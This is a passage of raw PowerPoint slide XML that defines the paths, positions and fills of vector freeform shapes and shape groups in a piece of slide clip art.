                      <a:gd name="T37" fmla="*/ 30 h 180"/>
                      <a:gd name="T38" fmla="*/ 59 w 159"/>
                      <a:gd name="T39" fmla="*/ 41 h 180"/>
                      <a:gd name="T40" fmla="*/ 42 w 159"/>
                      <a:gd name="T41" fmla="*/ 63 h 180"/>
                      <a:gd name="T42" fmla="*/ 42 w 159"/>
                      <a:gd name="T43" fmla="*/ 71 h 180"/>
                      <a:gd name="T44" fmla="*/ 42 w 159"/>
                      <a:gd name="T45" fmla="*/ 72 h 180"/>
                      <a:gd name="T46" fmla="*/ 42 w 159"/>
                      <a:gd name="T47" fmla="*/ 77 h 180"/>
                      <a:gd name="T48" fmla="*/ 42 w 159"/>
                      <a:gd name="T49" fmla="*/ 77 h 180"/>
                      <a:gd name="T50" fmla="*/ 43 w 159"/>
                      <a:gd name="T51" fmla="*/ 154 h 180"/>
                      <a:gd name="T52" fmla="*/ 43 w 159"/>
                      <a:gd name="T53" fmla="*/ 154 h 180"/>
                      <a:gd name="T54" fmla="*/ 43 w 159"/>
                      <a:gd name="T55" fmla="*/ 157 h 180"/>
                      <a:gd name="T56" fmla="*/ 84 w 159"/>
                      <a:gd name="T57" fmla="*/ 157 h 180"/>
                      <a:gd name="T58" fmla="*/ 85 w 159"/>
                      <a:gd name="T59" fmla="*/ 77 h 180"/>
                      <a:gd name="T60" fmla="*/ 89 w 159"/>
                      <a:gd name="T61" fmla="*/ 69 h 180"/>
                      <a:gd name="T62" fmla="*/ 141 w 159"/>
                      <a:gd name="T63" fmla="*/ 55 h 180"/>
                      <a:gd name="T64" fmla="*/ 159 w 159"/>
                      <a:gd name="T65" fmla="*/ 25 h 180"/>
                      <a:gd name="T66" fmla="*/ 159 w 159"/>
                      <a:gd name="T67" fmla="*/ 8 h 180"/>
                      <a:gd name="T68" fmla="*/ 159 w 159"/>
                      <a:gd name="T69" fmla="*/ 6 h 1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9" h="180">
                        <a:moveTo>
                          <a:pt x="159" y="6"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="156" y="17"/>
                          <a:pt x="140" y="23"/>
                          <a:pt x="132" y="21"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="124" y="20"/>
                          <a:pt x="94" y="14"/>
                          <a:pt x="81" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="10"/>
                          <a:pt x="73" y="5"/>
                          <a:pt x="72" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="19"/>
                          <a:pt x="72" y="18"/>
                          <a:pt x="68" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="19"/>
                          <a:pt x="28" y="28"/>
                          <a:pt x="17" y="32"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="7" y="36"/>
                          <a:pt x="2" y="42"/>
                          <a:pt x="1" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="1" y="55"/>
                          <a:pt x="0" y="135"/>
                          <a:pt x="1" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="163"/>
                          <a:pt x="25" y="165"/>
                          <a:pt x="36" y="156"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="153"/>
                          <a:pt x="43" y="149"/>
                          <a:pt x="43" y="145"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="130"/>
                          <a:pt x="42" y="102"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="73"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="73"/>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="68"/>
                          <a:pt x="42" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="65"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="63"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="50"/>
                          <a:pt x="48" y="44"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="37"/>
                          <a:pt x="101" y="30"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="28"/>
                          <a:pt x="107" y="28"/>
                          <a:pt x="103" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="101" y="30"/>
                          <a:pt x="68" y="37"/>
                          <a:pt x="59" y="41"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="44"/>
                          <a:pt x="43" y="50"/>
                          <a:pt x="42" y="63"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="70"/>
                          <a:pt x="42" y="71"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="71"/>
                          <a:pt x="42" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="72"/>
                          <a:pt x="42" y="74"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                          <a:pt x="42" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="154"/>
                          <a:pt x="43" y="154"/>
                          <a:pt x="43" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="155"/>
                          <a:pt x="43" y="156"/>
                          <a:pt x="43" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="180"/>
                          <a:pt x="84" y="177"/>
                          <a:pt x="84" y="157"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="84" y="142"/>
                          <a:pt x="85" y="80"/>
                          <a:pt x="85" y="77"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="74"/>
                          <a:pt x="87" y="70"/>
                          <a:pt x="89" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="91" y="69"/>
                          <a:pt x="136" y="57"/>
                          <a:pt x="141" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="153" y="52"/>
                          <a:pt x="159" y="47"/>
                          <a:pt x="159" y="25"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                          <a:pt x="159" y="8"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="7"/>
                          <a:pt x="159" y="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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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7" name="Freeform 426"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2089" y="1378"/>
                    <a:ext cx="119" cy="71"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 75 w 91"/>
                      <a:gd name="T1" fmla="*/ 0 h 54"/>
                      <a:gd name="T2" fmla="*/ 28 w 91"/>
                      <a:gd name="T3" fmla="*/ 14 h 54"/>
                      <a:gd name="T4" fmla="*/ 40 w 91"/>
                      <a:gd name="T5" fmla="*/ 46 h 54"/>
                      <a:gd name="T6" fmla="*/ 91 w 91"/>
                      <a:gd name="T7" fmla="*/ 32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1" h="54">
                        <a:moveTo>
                          <a:pt x="75" y="0"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="4"/>
                          <a:pt x="45" y="8"/>
                          <a:pt x="28" y="14"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="22"/>
                          <a:pt x="17" y="54"/>
                          <a:pt x="40" y="46"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="44"/>
                          <a:pt x="66" y="38"/>
                          <a:pt x="91" y="32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8" name="Oval 427"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="2069" y="1129"/>
                    <a:ext cx="105" cy="105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04" name="Group 428"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1722" y="2789"/>
                  <a:ext cx="866" cy="461"/>
                  <a:chOff x="790" y="1889"/>
                  <a:chExt cx="866" cy="461"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="213" name="Freeform 429"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1625" y="1949"/>
                    <a:ext cx="31" cy="234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" name="Freeform 430"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1592" y="1949"/>
                    <a:ext cx="33" cy="234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3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" name="Freeform 431"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="973" y="2116"/>
                    <a:ext cx="34" cy="234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4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4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6" name="Freeform 432"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1007" y="2116"/>
                    <a:ext cx="30" cy="234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4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7" name="Freeform 433"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="2066"/>
                    <a:ext cx="33" cy="234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3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8" name="Freeform 434"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="823" y="2066"/>
                    <a:ext cx="31" cy="234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9" name="Freeform 435"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1406" y="1902"/>
                    <a:ext cx="31" cy="234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4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4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0" name="Freeform 436"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1437" y="1902"/>
                    <a:ext cx="33" cy="234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4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" name="Freeform 437"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1007" y="1949"/>
                    <a:ext cx="649" cy="207"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 241"/>
                      <a:gd name="T1" fmla="*/ 65 h 77"/>
                      <a:gd name="T2" fmla="*/ 0 w 241"/>
                      <a:gd name="T3" fmla="*/ 77 h 77"/>
                      <a:gd name="T4" fmla="*/ 241 w 241"/>
                      <a:gd name="T5" fmla="*/ 12 h 77"/>
                      <a:gd name="T6" fmla="*/ 241 w 241"/>
                      <a:gd name="T7" fmla="*/ 0 h 77"/>
                      <a:gd name="T8" fmla="*/ 0 w 241"/>
                      <a:gd name="T9" fmla="*/ 65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1" h="77">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="77"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="12"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="241" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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2" name="Freeform 438"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="2066"/>
                    <a:ext cx="217" cy="90"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 80"/>
                      <a:gd name="T1" fmla="*/ 0 h 34"/>
                      <a:gd name="T2" fmla="*/ 0 w 80"/>
                      <a:gd name="T3" fmla="*/ 13 h 34"/>
                      <a:gd name="T4" fmla="*/ 80 w 80"/>
                      <a:gd name="T5" fmla="*/ 34 h 34"/>
                      <a:gd name="T6" fmla="*/ 80 w 80"/>
                      <a:gd name="T7" fmla="*/ 22 h 34"/>
                      <a:gd name="T8" fmla="*/ 0 w 80"/>
                      <a:gd name="T9" fmla="*/ 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0" h="34">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="34"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="80" y="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3" name="Freeform 439"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="790" y="1889"/>
                    <a:ext cx="866" cy="236"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 321"/>
                      <a:gd name="T1" fmla="*/ 65 h 87"/>
                      <a:gd name="T2" fmla="*/ 160 w 321"/>
                      <a:gd name="T3" fmla="*/ 22 h 87"/>
                      <a:gd name="T4" fmla="*/ 160 w 321"/>
                      <a:gd name="T5" fmla="*/ 22 h 87"/>
                      <a:gd name="T6" fmla="*/ 240 w 321"/>
                      <a:gd name="T7" fmla="*/ 0 h 87"/>
                      <a:gd name="T8" fmla="*/ 321 w 321"/>
                      <a:gd name="T9" fmla="*/ 22 h 87"/>
                      <a:gd name="T10" fmla="*/ 240 w 321"/>
                      <a:gd name="T11" fmla="*/ 44 h 87"/>
                      <a:gd name="T12" fmla="*/ 240 w 321"/>
                      <a:gd name="T13" fmla="*/ 44 h 87"/>
                      <a:gd name="T14" fmla="*/ 81 w 321"/>
                      <a:gd name="T15" fmla="*/ 87 h 87"/>
                      <a:gd name="T16" fmla="*/ 0 w 321"/>
                      <a:gd name="T17" fmla="*/ 65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21" h="87">
                        <a:moveTo>
                          <a:pt x="0" y="65"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="160" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="321" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="240" y="44"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="81" y="87"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="8E47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05" name="Group 440"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2020" y="2756"/>
                  <a:ext cx="270" cy="180"/>
                  <a:chOff x="1859" y="2279"/>
                  <a:chExt cx="372" cy="247"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="206" name="Freeform 441"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2412"/>
                    <a:ext cx="372" cy="100"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 25173"/>
                      <a:gd name="T1" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T2" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T3" fmla="*/ 0 h 6756"/>
                      <a:gd name="T4" fmla="*/ 25173 w 25173"/>
                      <a:gd name="T5" fmla="*/ 3378 h 6756"/>
                      <a:gd name="T6" fmla="*/ 12585 w 25173"/>
                      <a:gd name="T7" fmla="*/ 6756 h 6756"/>
                      <a:gd name="T8" fmla="*/ 0 w 25173"/>
                      <a:gd name="T9" fmla="*/ 3378 h 67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5173" h="6756">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="25173" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="6756"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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969696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7" name="Freeform 442"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2045" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12588"/>
                      <a:gd name="T1" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12588"/>
                      <a:gd name="T3" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T4" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T5" fmla="*/ 964 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12588 w 12588"/>
                      <a:gd name="T7" fmla="*/ 0 h 4342"/>
                      <a:gd name="T8" fmla="*/ 0 w 12588"/>
                      <a:gd name="T9" fmla="*/ 3378 h 43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588" h="4342">
                        <a:moveTo>
                          <a:pt x="0" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="4342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12588" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="3378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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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8" name="Freeform 443"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2462"/>
                    <a:ext cx="186" cy="64"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T1" fmla="*/ 4342 h 4342"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 964 h 4342"/>
                      <a:gd name="T4" fmla="*/ 0 w 12585"/>
                      <a:gd name="T5" fmla="*/ 0 h 4342"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                      <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                        <a:moveTo>
                          <a:pt x="12585" y="4342"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="964"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3378"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="434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9" name="Freeform 444"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1912" y="2428"/>
                    <a:ext cx="252" cy="68"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 17020"/>
                      <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                      <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                      <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                      <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                      <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                      <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                      <a:gd name="T7" fmla="*/ 0 h 4567"/>
                      <a:gd name="T8" fmla="*/ 0 w 17020"/>
                      <a:gd name="T9" fmla="*/ 1711 h 45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7020" h="4567">
                        <a:moveTo>
                          <a:pt x="0" y="1711"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="10647" y="4567"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="17020" y="2859"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="6371" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1711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C0C0C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0" name="Freeform 445"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2283"/>
                    <a:ext cx="186" cy="243"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 12585"/>
                      <a:gd name="T1" fmla="*/ 0 h 16411"/>
                      <a:gd name="T2" fmla="*/ 0 w 12585"/>
                      <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                      <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                      <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                      <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                      <a:gd name="T8" fmla="*/ 0 w 12585"/>
                      <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="13033"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="16411"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="12585" y="337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969696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" name="Freeform 446"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2045" y="2329"/>
                    <a:ext cx="14" cy="197"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 971"/>
                      <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                      <a:gd name="T2" fmla="*/ 971 w 971"/>
                      <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                      <a:gd name="T4" fmla="*/ 971 w 971"/>
                      <a:gd name="T5" fmla="*/ 0 h 13293"/>
                      <a:gd name="T6" fmla="*/ 0 w 971"/>
                      <a:gd name="T7" fmla="*/ 260 h 13293"/>
                      <a:gd name="T8" fmla="*/ 0 w 971"/>
                      <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                        <a:moveTo>
                          <a:pt x="0" y="13293"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="971" y="13030"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="13293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 w="6350" cap="flat" cmpd="sng">
                    <a:solidFill>
                      <a:srgbClr val="80808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" name="Freeform 447"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1859" y="2279"/>
                    <a:ext cx="200" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                      <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                      <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                      <a:gd name="T4" fmla="*/ 0 w 13556"/>
                      <a:gd name="T5" fmla="*/ 260 h 3638"/>
                      <a:gd name="T6" fmla="*/ 971 w 13556"/>
                      <a:gd name="T7" fmla="*/ 0 h 3638"/>
                      <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                      <a:gd name="T9" fmla="*/ 3378 h 36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556" h="3638">
                        <a:moveTo>
                          <a:pt x="13556" y="3378"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="12585" y="3638"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="260"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="971" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="13556" y="3378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C0C0C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97" name="Group 448"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2977" y="2038"/>
                <a:ext cx="180" cy="180"/>
                <a:chOff x="562" y="1822"/>
                <a:chExt cx="318" cy="318"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="198" name="Rectangle 449"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="840" y="2100"/>
                  <a:ext cx="40" cy="40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Rectangle 450"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="759" y="2019"/>
                  <a:ext cx="71" cy="71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200" name="Group 451"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="562" y="1822"/>
                  <a:ext cx="187" cy="187"/>
                  <a:chOff x="-12610" y="18860"/>
                  <a:chExt cx="330" cy="331"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="201" name="Rectangle 452"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-12610" y="18860"/>
                    <a:ext cx="330" cy="331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1B171B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2" name="Freeform 453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-12535" y="18898"/>
                    <a:ext cx="182" cy="255"/>
                  </a:xfrm>
                  <a:custGeom>
